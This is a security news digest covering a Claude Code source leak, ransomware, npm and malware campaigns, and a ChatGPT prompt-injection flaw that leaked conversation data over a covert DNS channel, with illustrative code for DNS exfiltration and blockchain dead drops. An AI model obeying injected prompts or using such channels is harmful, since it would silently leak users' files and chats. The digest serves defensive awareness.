
Claude Code Source Leak: How a Simple npm Mistake Exposed Anthropic’s Internal AI Engine

A recent incident involving Anthropic has drawn significant attention across the cybersecurity and AI communities after internal source code for its AI coding assistant, Claude Code, was unintentionally exposed online.

What Happened?

Anthropic confirmed that a release of Claude Code (version 2.1.88) accidentally included a source map file within its npm package. This file, typically used for debugging, allowed anyone to reconstruct the original TypeScript source code, effectively exposing the internal workings of the application. The leak consisted of roughly 500,000 lines of code spread across nearly 2,000 files, giving a detailed look into the architecture, tools, and orchestration logic behind the AI-powered coding assistant. Anthropic clarified that the incident was caused by a packaging error and human oversight, not an external breach or cyberattack. Importantly, no customer data or credentials were compromised.

What the Leak Revealed

The exposed codebase provided deep insig...
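The mechanics behind the leak are worth pausing on: the Source Map v3 format has an optional `sourcesContent` field that can embed the complete original files, so a shipped `.map` file hands out the TypeScript verbatim. A minimal sketch of the recovery (file names and contents below are invented for illustration):

```python
import json

# A trimmed stand-in for a Source Map v3 file (e.g. cli.js.map). When the
# optional "sourcesContent" field is populated, it embeds the complete
# original files, so anyone holding the .map can read the source directly.
source_map = json.loads("""
{
  "version": 3,
  "file": "cli.js",
  "sources": ["src/agent.ts", "src/tools.ts"],
  "sourcesContent": [
    "export const run = () => { /* original TypeScript */ };",
    "export const tools = [];"
  ],
  "mappings": "AAAA"
}
""")

# Reconstruct the original file tree from the map alone.
recovered = dict(zip(source_map["sources"], source_map["sourcesContent"]))
for path, code in recovered.items():
    print(path, "->", len(code), "chars")
```

No decoding of the `mappings` field is even required when `sourcesContent` is present; the straightforward mitigation is excluding or stripping `.map` files from published packages.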

Bearlyfy Hits Russian Firms with Custom GenieLocker Ransomware

A pro-Ukrainian group called Bearlyfy has been linked to more than 70 cyberattacks targeting Russian companies since it first surfaced in the threat landscape in January 2025, with recent attacks leveraging a custom Windows ransomware strain codenamed GenieLocker. Bearlyfy (also known as Labubu) operates as a dual-purpose group aimed at inflicting maximum damage on Russian businesses; its attacks serve the twin objectives of extortion for financial gain and outright sabotage. The group was first documented by F6 in September 2025 as leveraging encryptors associated with LockBit 3 (Black) and Babuk, with early intrusions focusing on smaller companies before upping the ante and demanding ransoms to the tune of €80,000 (about $92,100). By August 2025, the group had claimed at least 30 victims. Beginning in May 2025, Bearlyfy actors also utilized a modified version of PolyVice, a ransomware family attributed to Vice Society...

Critical AI Vulnerability: OpenAI Patches ChatGPT Data Exfiltration Flaw

Security researchers have identified a serious vulnerability in ChatGPT that allowed sensitive user data to be exfiltrated without the user's knowledge. The issue has now been patched by OpenAI, but it raises major concerns about data security in AI-driven environments. Researchers demonstrated how a single malicious prompt could turn a normal interaction into a covert data exfiltration channel.

How the Attack Worked

The vulnerability relied on prompt injection techniques, where attackers could manipulate the AI's behavior through carefully crafted inputs. In this case, malicious prompts could force ChatGPT to leak:

- Conversation history
- Uploaded files
- Sensitive contextual data

What makes this particularly dangerous is that the attack could occur silently, without any visible indication to the user.

Codex Vulnerability Expands the Risk

Alongside the ChatGPT issue, researchers also identified a separate vulnerability affecting Open...

Big Tech AI Spending and the Energy Cost Risk

This report summarizes Reuters reporting from March 31, 2026, on the scale of planned AI infrastructure spending by major technology firms and the risks posed by rising energy costs. Reuters reported that, before the Iran war, Microsoft, Amazon, Alphabet, and Meta were expected to spend about $635 billion in 2026 on data centers, chips, and other AI infrastructure. That figure was described as an increase from $383 billion the previous year and $80 billion in 2019.

Objective

The objective of this report is to explain how energy market volatility could affect AI investment plans, corporate earnings, and broader equity markets. The article frames the issue not as a technology slowdown by default, but as a stress test for whether current AI spending plans remain sustainable if energy costs rise further.

Summary of Findings

Reuters cited Melissa Otto, head of research at S&P Global Visible Alpha, who said that persistently high oil prices could force revisions to capital spending...

OpenAI Patch for ChatGPT Data Exfiltration and Codex Token Vulnerability

Overview

This report summarizes two security issues involving OpenAI products that were publicly described on March 30, 2026. The first issue concerned a previously unknown flaw in ChatGPT that researchers said could allow sensitive conversation content, including uploaded files and user messages, to be exfiltrated through a covert DNS-based channel originating from the Linux runtime used for code execution and data analysis. The second issue concerned a command injection vulnerability in OpenAI Codex that researchers said could expose GitHub tokens and enable unauthorized access to code repositories. According to the reporting, OpenAI patched the ChatGPT issue on February 20, 2026, and patched the Codex issue on February 5, 2026. The article also states there was no evidence the ChatGPT flaw had been maliciously exploited.

Objective

The objective of this report is to document the nature of the vulnerabilities, describe their potential impact on users and organizations, and hig...
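To make the covert-channel idea concrete, here is a minimal sketch of how DNS-based exfiltration generally works: data is hex-encoded and split into chunks that fit the 63-character DNS label limit, and each resulting hostname lookup delivers one chunk to the attacker's authoritative nameserver. The domain and data below are invented; this shows the general pattern, not the reported specifics of the ChatGPT flaw:

```python
import textwrap

MAX_LABEL = 63                    # per-label limit from RFC 1035
ATTACKER_ZONE = "exfil.example"   # hypothetical attacker-controlled domain

def dns_exfil_names(data: bytes, session: int = 0) -> list[str]:
    """Encode data as hostnames under the attacker's zone. Resolving each
    name leaks one chunk via an ordinary-looking DNS query, with no direct
    HTTP connection back to the attacker."""
    chunks = textwrap.wrap(data.hex(), MAX_LABEL)
    return [f"{chunk}.{session}-{i}.{ATTACKER_ZONE}"
            for i, chunk in enumerate(chunks)]

for name in dns_exfil_names(b"uploaded-file contents or chat history"):
    print(name)
```

Defensively, this is why egress monitoring flags high-entropy subdomains and unusually long DNS labels originating from sandboxed runtimes.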

Critical Supply Chain Attack: Axios npm Package Compromised to Deliver Cross-Platform RAT

A major supply chain attack has impacted the widely used JavaScript library Axios, after attackers managed to publish malicious versions of the package to npm using compromised maintainer credentials. The incident affects versions 1.14.1 and 0.30.4, which were found to include a hidden malicious dependency designed to deliver malware across multiple operating systems.

How the Attack Was Executed

The attackers gained access to the npm account of a core Axios maintainer, allowing them to push tampered versions of the package without raising immediate suspicion. These malicious releases introduced a fake dependency named "plain-crypto-js", which served as the initial infection vector. Because the packages were published through legitimate channels, they bypassed standard CI/CD security checks, making the attack particularly dangerous.

Malware Delivery via Post-Install Script

The injected dependency was far from harmless: it contained a post-install script that executed au...
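For teams checking their exposure, the compromised versions can be flagged straight from a lockfile. A rough sketch, assuming the npm v3 `package-lock.json` layout (a `packages` map keyed by `node_modules` paths); the bad-version list comes from the incident described above, while the example lockfile is fabricated:

```python
import json

# Versions and the rogue dependency named in the incident report.
BAD_VERSIONS = {"axios": {"1.14.1", "0.30.4"}}
ROGUE_PACKAGES = {"plain-crypto-js"}

def audit_lockfile(lock_text: str) -> list[str]:
    """Scan an npm v3 package-lock.json ("packages" map keyed by
    node_modules paths) and flag compromised pins or rogue dependencies."""
    lock = json.loads(lock_text)
    findings = []
    for path, meta in lock.get("packages", {}).items():
        name = path.rpartition("node_modules/")[2]
        version = meta.get("version", "")
        if name in ROGUE_PACKAGES:
            findings.append(f"rogue dependency present: {name}@{version}")
        if version in BAD_VERSIONS.get(name, set()):
            findings.append(f"compromised version pinned: {name}@{version}")
    return findings

example_lock = json.dumps({
    "packages": {
        "": {"name": "app"},
        "node_modules/axios": {"version": "1.14.1"},
        "node_modules/axios/node_modules/plain-crypto-js": {"version": "1.0.0"},
    }
})
for finding in audit_lockfile(example_lock):
    print(finding)
```

Installing with `npm ci --ignore-scripts` also blunts this class of attack, since the payload here relied on a post-install hook to run at all.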

Advanced Malware Threat: GlassWorm Uses Solana Blockchain to Evade Detection

Security researchers have uncovered a new evolution of the GlassWorm malware campaign, introducing a highly sophisticated technique that leverages blockchain technology to hide its command-and-control (C2) infrastructure. Unlike traditional malware, this variant uses the Solana blockchain as a “dead drop” mechanism to retrieve instructions and payloads, making detection and takedown significantly more difficult.

How the Attack Works

The attack chain is multi-stage and designed for maximum stealth and data exfiltration. Initial access is typically gained through compromised developer ecosystems, including malicious packages distributed via platforms like npm, PyPI, GitHub, and extension marketplaces. Once executed, the malware retrieves instructions from data embedded in Solana blockchain transactions, effectively hiding its infrastructure in a decentralized and immutable environment. From there, it downloads system-specific payloads and begins the infection process.

Multi-Stage...
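The “dead drop” pattern itself is simple to illustrate: the malware treats an on-chain data field as a read-only mailbox and decodes it into its next instructions. Everything below is fabricated for illustration (the field layout, URL, and JSON schema are not taken from the GlassWorm analysis); it sketches the pattern, not the actual implant:

```python
import base64
import json

# A purely illustrative stand-in for on-chain memo data: the implant's
# instructions ride as an opaque payload inside an otherwise ordinary
# transaction, so defenders see only normal-looking blockchain traffic.
fake_memo = base64.b64encode(json.dumps({
    "payload_url": "https://cdn.example/stage2",  # hypothetical stager
    "min_version": 2,
}).encode()).decode()

def read_dead_drop(memo_b64: str) -> dict:
    """Decode attacker instructions from a base64 memo field. Because the
    chain is immutable and decentralized, there is no single C2 server to
    seize or sinkhole; the instructions simply persist on-chain."""
    return json.loads(base64.b64decode(memo_b64))

instructions = read_dead_drop(fake_memo)
print(instructions["payload_url"])
```

The defensive takeaway is that blocking a domain list is insufficient here; detection has to key on the malware's local behavior, such as package provenance and post-install activity, rather than on its infrastructure.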